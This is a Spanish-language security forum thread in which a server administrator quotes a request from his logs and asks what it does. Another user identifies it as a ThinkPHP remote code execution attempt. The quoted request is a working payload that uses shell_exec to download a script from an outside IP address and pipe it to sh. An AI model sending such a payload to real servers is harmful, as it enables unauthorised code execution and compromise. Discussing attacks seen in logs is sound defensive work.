elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  Peticiones al servidor usando Yii PHP Framework
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Peticiones al servidor usando Yii PHP Framework  (Leído 1,663 veces)
warcry.


Desconectado Desconectado

Mensajes: 1.003


Ver Perfil
Peticiones al servidor usando Yii PHP Framework
« en: 13 Marzo 2021, 19:38 pm »

Últimamente me están lanzando al servidor web, bastantes peticiones del tipo:

Código:
Requested GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://31.210.20.181/ldr.sh|sh

Una rápida búsqueda en google, me dice que pueden ser originadas por alguna de las herramientas de Yii PHP framework

el código de la petición entiendo que es básicamente que descargue un script y lo ejecute.

a ver si alguien tiene mas conocimientos sobre el tema


En línea

HE SIDO BANEADO --- UN PLACER ---- SALUDOS
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 20.634


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Peticiones al servidor usando Yii PHP Framework
« Respuesta #1 en: 17 Marzo 2021, 00:19 am »

¿Qué user agent hace la petición?

ThinkPHP Remote Code Execution (RCE)

Usarán alguna herramienta automatizada tipo Nuclei Scanner
https://github.com/projectdiscovery/nuclei

Hay un montón de variantes:
https://www.exploit-db.com/exploits/46150

Ahora la petición estrella es OWA de Microsoft Exchange
Código:
GET /owa/auth/logon.aspx


En línea

warcry.


Desconectado Desconectado

Mensajes: 1.003


Ver Perfil
Re: Peticiones al servidor usando Yii PHP Framework
« Respuesta #2 en: 19 Marzo 2021, 19:32 pm »

¿Qué user agent hace la petición?



Código:
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
En línea

HE SIDO BANEADO --- UN PLACER ---- SALUDOS
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines